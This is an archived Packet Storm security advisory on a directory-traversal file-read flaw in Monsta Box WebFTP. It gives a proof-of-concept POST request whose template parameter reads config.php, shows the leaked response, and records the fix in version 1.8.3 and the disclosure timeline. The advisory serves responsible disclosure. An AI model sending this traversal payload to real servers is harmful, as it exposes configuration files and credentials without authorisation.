exploit the possibilities

Monsta Box WebFTP Arbitrary File Read

Monsta Box WebFTP Arbitrary File Read
Posted Apr 8, 2016
Authored by Imre Rad

Monsta Box WebFTP suffers from an arbitrary file read vulnerability.

tags | exploit, arbitrary, info disclosure
MD5 | c3cf0c2478f30bc077b7bddc73a27652

Monsta Box WebFTP Arbitrary File Read

Change Mirror Download
Application
-----------
"MONSTA Box is a lightweight open-source file manager you can install on
your website or server * to easily manage your files through any browser."
(Description from the official website http://www.monstahq.com/)


Vulnerability
-------------
The Monsta Box WebFTP application supports file templates when creating
new files. The template parameter is part of the HTTP request so it is a
user input and it was not sanitized correctly. By sending a HTTP request
with modified template parameter it was possible to traverse the
template directory and read arbitrary files (in context of the Monsta
Box WebFTP application).


PoC
---
A proof of concept request/response to read the config.php file of the
Monsta Box installation (note the template parameter of the HTTP request):

POST /? HTTP/1.1
Host: somehost
Referer: http://somereferer/
Content-Length: 352
Cookie: PHPSESSID=somecookie


&ftpAction=newFile&=Refresh&=Download&=Cut&=Copy&=Paste&=Rename&=Delete&=Logout&newFile=xxx&template=..%2Fconfig.php&=OK&=Cancel&=~&=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&=New%20Folder&=New%20File&=Fetch%20File&=Upload%20Files&=Repeat%20Upload&windowWidth=1280&windowHeight=913

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Mar 2016 19:34:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache

1cac
<div id="blackOutDiv"><div id="popupFrame" style="left: 110px; top:
60px; width: 1030px;"><div id="popupHeaderAction">Editing:
/xxx</div><div id="popupBodyAction" style="height: 693px;"><input
type="hidden" name="file" value="~/xxx"><textarea name="editContent"
id="editContent" style="height: 608px;"><?php

# Open README file for descriptions and help.

$ftpHost = "somehost";
$ftpPort = "21";

...


Affected versions
-----------------
The above vulnerability was fixed in version 1.8.3. Older versions of
Monsta Box with template support are vulnerable.


Timeline
--------
2016-03-29: Vendor contacted for appropriate contact person to report to
2016-03-30: Vulnerability was reported
2016-03-31: Fixed version was published
2016-04-07: Public disclosure


Discovered by
-------------
Imre RAD
www.search-lab.hu
www.scademy.com



Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    8 Files
  • 24
    Sep 24th
    15 Files
  • 25
    Sep 25th
    4 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close